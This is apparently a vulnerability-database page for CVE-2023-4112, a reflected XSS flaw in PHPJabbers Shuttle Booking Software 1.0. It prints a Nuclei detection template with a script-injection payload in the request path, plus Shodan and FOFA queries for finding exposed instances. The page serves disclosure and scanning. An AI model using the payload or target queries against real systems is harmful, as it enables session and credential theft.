CVE-2023-4112: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting

日期: 2025-08-01 | 影响软件: PHPJabbers Shuttle Booking Software | POC: 已公开

漏洞描述

The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.

PoC代码[已公开]

id: CVE-2023-4112

info:
  name: PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
  reference:
    - https://www.exploitalert.com/view-details.html?id=39750
    - https://cxsecurity.com/ascii/WLB-2023080012
    - http://packetstormsecurity.com/files/173930/PHPJabbers-Shuttle-Booking-Software-1.0-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4112
    - https://vuldb.com/?ctiid.235959
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-4112
    cwe-id: CWE-79
    epss-score: 0.08886
    epss-percentile: 0.92244
    cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: phpjabbers
    product: shuttle_booking_software
    shodan-query:
      - html:"PHP Jabbers.com"
      - http.html:"php jabbers.com"
    fofa-query: body="php jabbers.com"
  tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "PHPJabbers") && contains(body, "><script>alert(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 490a004630440220531f3744ff5a20a19ca5d2d345509aa80e344be917b0c10f6c36a723a9f4a960022006855d76f9cad27cb695b064d65068d62a9c7bb4b0b5e0ea8970c5a273ef877c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐